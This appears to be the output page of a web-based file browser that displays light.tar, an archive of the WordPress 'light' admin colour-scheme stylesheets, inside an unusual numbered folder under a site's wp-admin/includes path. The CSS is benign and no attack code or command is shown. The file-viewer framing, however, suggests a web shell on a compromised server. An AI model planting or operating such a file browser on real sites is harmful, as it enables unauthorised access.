Submit
Path:
~
/
home
/
contenidosenred
/
public_html
/
OD
/
wp-admin
/
includes
/
219846
/
File Content:
light.tar
colors-rtl.css 0000644 00000052546 15106640004 0007366 0 ustar 00 /*! This file is auto-generated */ /* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f5f5f5; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } .wp-core-ui .button-link { color: #0073aa; } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button-link:focus { color: rgb(0, 149.5, 221); } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #a00; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: #dc3232; } /* Forms */ input[type=checkbox]:checked::before { content: url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%237e8993%27%2F%3E%3C%2Fsvg%3E"); } input[type=radio]:checked::before { background: #7e8993; } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=text]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, input[type=checkbox]:focus, input[type=radio]:focus, select:focus, textarea:focus { border-color: #04a4cc; box-shadow: 0 0 0 1px #04a4cc; } /* Core UI */ .wp-core-ui .button { border-color: #7e8993; color: #32373c; } .wp-core-ui .button.hover, .wp-core-ui .button:hover, .wp-core-ui .button.focus, .wp-core-ui .button:focus { border-color: rgb(112.7848101266, 124.2721518987, 134.7151898734); color: rgb(38.4090909091, 42.25, 46.0909090909); } .wp-core-ui .button.focus, .wp-core-ui .button:focus { border-color: #7e8993; color: rgb(38.4090909091, 42.25, 46.0909090909); box-shadow: 0 0 0 1px #32373c; } .wp-core-ui .button:active { border-color: #7e8993; color: rgb(38.4090909091, 42.25, 46.0909090909); box-shadow: none; } .wp-core-ui .button.active, .wp-core-ui .button.active:focus, .wp-core-ui .button.active:hover { border-color: #04a4cc; color: rgb(38.4090909091, 42.25, 46.0909090909); box-shadow: inset 0 2px 5px -3px #04a4cc; } .wp-core-ui .button.active:focus { box-shadow: 0 0 0 1px #32373c; } .wp-core-ui .button, .wp-core-ui .button-secondary { color: #04a4cc; border-color: #04a4cc; } .wp-core-ui .button.hover, .wp-core-ui .button:hover, .wp-core-ui .button-secondary:hover { border-color: rgb(3.0192307692, 123.7884615385, 153.9807692308); color: rgb(3.0192307692, 123.7884615385, 153.9807692308); } .wp-core-ui .button.focus, .wp-core-ui .button:focus, .wp-core-ui .button-secondary:focus { border-color: rgb(8.8269230769, 201.9038461538, 250.1730769231); color: rgb(2.0384615385, 83.5769230769, 103.9615384615); box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231); } .wp-core-ui .button-primary:hover { color: #fff; } .wp-core-ui .button-primary { background: #04a4cc; border-color: #04a4cc; color: #fff; } .wp-core-ui .button-primary:hover, .wp-core-ui .button-primary:focus { background: rgb(4.2942307692, 176.0634615385, 219.0057692308); border-color: rgb(3.7057692308, 151.9365384615, 188.9942307692); color: #fff; } .wp-core-ui .button-primary:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #04a4cc; } .wp-core-ui .button-primary:active { background: rgb(3.5096153846, 143.8942307692, 178.9903846154); border-color: rgb(3.5096153846, 143.8942307692, 178.9903846154); color: #fff; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: #04a4cc; color: #fff; border-color: rgb(2.5288461538, 103.6826923077, 128.9711538462); box-shadow: inset 0 2px 5px -3px hsl(192, 96.1538461538%, -9.2156862745%); } .wp-core-ui .button-group > .button.active { border-color: #04a4cc; } .wp-core-ui .wp-ui-primary { color: #333; background-color: #e5e5e5; } .wp-core-ui .wp-ui-text-primary { color: #e5e5e5; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #888; } .wp-core-ui .wp-ui-text-highlight { color: #888; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #d64e07; } .wp-core-ui .wp-ui-text-notification { color: #d64e07; } .wp-core-ui .wp-ui-text-icon { color: #999; } /* List tables */ .wrap .page-title-action, .wrap .page-title-action:active { border: 1px solid #04a4cc; color: #04a4cc; } .wrap .page-title-action:hover { color: rgb(3.0192307692, 123.7884615385, 153.9807692308); border-color: rgb(3.0192307692, 123.7884615385, 153.9807692308); } .wrap .page-title-action:focus { border-color: rgb(8.8269230769, 201.9038461538, 250.1730769231); color: rgb(2.0384615385, 83.5769230769, 103.9615384615); box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231); } .view-switch a.current:before { color: #e5e5e5; } .view-switch a:hover:before { color: #d64e07; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #e5e5e5; } #adminmenu a { color: #333; } #adminmenu div.wp-menu-image:before { color: #999; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #888; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #ccc; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f5f5f5; border-bottom-color: #f5f5f5; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: #fff; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: #fff; } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(104.4, 104.4, 104.4); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: rgb(104.4, 104.4, 104.4); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #04a4cc; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #333; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #04a4cc; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-left-color: #f5f5f5; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #888; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #ccc; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #d64e07; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #333; background: #fff; } /* Admin Menu: collapse button */ #collapse-button { color: #777; } #collapse-button:hover, #collapse-button:focus { color: #04a4cc; } /* Admin Bar */ #wpadminbar { color: #333; background: #e5e5e5; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #333; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #999; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #04a4cc; background: #fff; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #04a4cc; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #04a4cc; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: #fff; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(246.85, 246.85, 246.85); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(104.4, 104.4, 104.4); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #999; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #04a4cc; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #04a4cc; } #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #999; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #999; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #333; background: rgb(246.85, 246.85, 246.85); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #d64e07; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(192.6, 70.2, 6.3); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(246.85, 246.85, 246.85); background-color: rgb(246.85, 246.85, 246.85); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #333; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #04a4cc; } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(104.4, 104.4, 104.4); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #04a4cc; border-color: rgb(3.5096153846, 143.8942307692, 178.9903846154); } .wp-pointer .wp-pointer-content h3:before { color: #04a4cc; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #04a4cc; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #04a4cc; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #04a4cc; } .attachment.details .check { background-color: #04a4cc; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #04a4cc; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #04a4cc; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #04a4cc; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #04a4cc; } .theme-section.current, .theme-filter.current { border-bottom-color: #e5e5e5; } body.more-filters-opened .more-filters { color: #333; background-color: #e5e5e5; } body.more-filters-opened .more-filters:before { color: #333; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #888; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #888; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #999; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #888; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #fff; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #999; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #04a4cc; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-right-color: #04a4cc; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #04a4cc; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-right-color: #04a4cc; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-right-color: #04a4cc; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #04a4cc; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #04a4cc; border-style: solid; box-shadow: 0 0 0 1px #04a4cc; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #04a4cc; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #04a4cc; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #04a4cc; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #04a4cc; color: #0073aa; } /* Override the theme filter highlight color for this scheme */ .theme-section.current, .theme-filter.current { border-bottom-color: #04a4cc; } colors.scss 0000644 00000001557 15106640004 0006746 0 ustar 00 @use "sass:color"; $highlight-color: #04a4cc; $text-color: #333; $menu-avatar-frame: #aaa; @use "../_admin.scss" with ( $scheme-name: "light", $base-color: #e5e5e5, $icon-color: #999, $text-color: $text-color, $highlight-color: $highlight-color, $notification-color: #d64e07, $body-background: #f5f5f5, $menu-highlight-text: #fff, $menu-highlight-icon: #ccc, $menu-highlight-background: #888, $menu-bubble-text: #fff, $menu-submenu-background: #fff, $menu-collapse-text: #777, $menu-collapse-focus-icon: #555, $dashboard-accent-1: $highlight-color, $dashboard-accent-2: color.adjust(color.adjust($highlight-color, $lightness: 7%), $saturation: -15%), $dashboard-icon-background: $text-color ); /* Override the theme filter highlight color for this scheme */ .theme-section.current, .theme-filter.current { border-bottom-color: admin.$highlight-color; } colors.min.css 0000644 00000045610 15106640004 0007343 0 ustar 00 /*! This file is auto-generated */ body{background:#f5f5f5}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link{color:#0073aa}.wp-core-ui .button-link:active,.wp-core-ui .button-link:focus,.wp-core-ui .button-link:hover{color:rgb(0,149.5,221)}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#a00}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:#dc3232}input[type=checkbox]:checked::before{content:url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%237e8993%27%2F%3E%3C%2Fsvg%3E")}input[type=radio]:checked::before{background:#7e8993}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=checkbox]:focus,input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=radio]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:#04a4cc;box-shadow:0 0 0 1px #04a4cc}.wp-core-ui .button{border-color:#7e8993;color:#32373c}.wp-core-ui .button.focus,.wp-core-ui .button.hover,.wp-core-ui .button:focus,.wp-core-ui .button:hover{border-color:rgb(112.7848101266,124.2721518987,134.7151898734);color:rgb(38.4090909091,42.25,46.0909090909)}.wp-core-ui .button.focus,.wp-core-ui .button:focus{border-color:#7e8993;color:rgb(38.4090909091,42.25,46.0909090909);box-shadow:0 0 0 1px #32373c}.wp-core-ui .button:active{border-color:#7e8993;color:rgb(38.4090909091,42.25,46.0909090909);box-shadow:none}.wp-core-ui .button.active,.wp-core-ui .button.active:focus,.wp-core-ui .button.active:hover{border-color:#04a4cc;color:rgb(38.4090909091,42.25,46.0909090909);box-shadow:inset 0 2px 5px -3px #04a4cc}.wp-core-ui .button.active:focus{box-shadow:0 0 0 1px #32373c}.wp-core-ui .button,.wp-core-ui .button-secondary{color:#04a4cc;border-color:#04a4cc}.wp-core-ui .button-secondary:hover,.wp-core-ui .button.hover,.wp-core-ui .button:hover{border-color:rgb(3.0192307692,123.7884615385,153.9807692308);color:rgb(3.0192307692,123.7884615385,153.9807692308)}.wp-core-ui .button-secondary:focus,.wp-core-ui .button.focus,.wp-core-ui .button:focus{border-color:rgb(8.8269230769,201.9038461538,250.1730769231);color:rgb(2.0384615385,83.5769230769,103.9615384615);box-shadow:0 0 0 1px rgb(8.8269230769,201.9038461538,250.1730769231)}.wp-core-ui .button-primary:hover{color:#fff}.wp-core-ui .button-primary{background:#04a4cc;border-color:#04a4cc;color:#fff}.wp-core-ui .button-primary:focus,.wp-core-ui .button-primary:hover{background:rgb(4.2942307692,176.0634615385,219.0057692308);border-color:rgb(3.7057692308,151.9365384615,188.9942307692);color:#fff}.wp-core-ui .button-primary:focus{box-shadow:0 0 0 1px #fff,0 0 0 3px #04a4cc}.wp-core-ui .button-primary:active{background:rgb(3.5096153846,143.8942307692,178.9903846154);border-color:rgb(3.5096153846,143.8942307692,178.9903846154);color:#fff}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:#04a4cc;color:#fff;border-color:rgb(2.5288461538,103.6826923077,128.9711538462);box-shadow:inset 0 2px 5px -3px hsl(192,96.1538461538%,-9.2156862745%)}.wp-core-ui .button-group>.button.active{border-color:#04a4cc}.wp-core-ui .wp-ui-primary{color:#333;background-color:#e5e5e5}.wp-core-ui .wp-ui-text-primary{color:#e5e5e5}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#888}.wp-core-ui .wp-ui-text-highlight{color:#888}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#d64e07}.wp-core-ui .wp-ui-text-notification{color:#d64e07}.wp-core-ui .wp-ui-text-icon{color:#999}.wrap .page-title-action,.wrap .page-title-action:active{border:1px solid #04a4cc;color:#04a4cc}.wrap .page-title-action:hover{color:rgb(3.0192307692,123.7884615385,153.9807692308);border-color:rgb(3.0192307692,123.7884615385,153.9807692308)}.wrap .page-title-action:focus{border-color:rgb(8.8269230769,201.9038461538,250.1730769231);color:rgb(2.0384615385,83.5769230769,103.9615384615);box-shadow:0 0 0 1px rgb(8.8269230769,201.9038461538,250.1730769231)}.view-switch a.current:before{color:#e5e5e5}.view-switch a:hover:before{color:#d64e07}#adminmenu,#adminmenuback,#adminmenuwrap{background:#e5e5e5}#adminmenu a{color:#333}#adminmenu div.wp-menu-image:before{color:#999}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#888}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#ccc}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f5f5f5;border-bottom-color:#f5f5f5}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:#fff}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-right-color:#fff}#adminmenu .wp-submenu .wp-submenu-head{color:rgb(104.4,104.4,104.4)}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:rgb(104.4,104.4,104.4)}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:#04a4cc}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#333}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:#04a4cc}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-right-color:#f5f5f5}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#888}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#ccc}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu 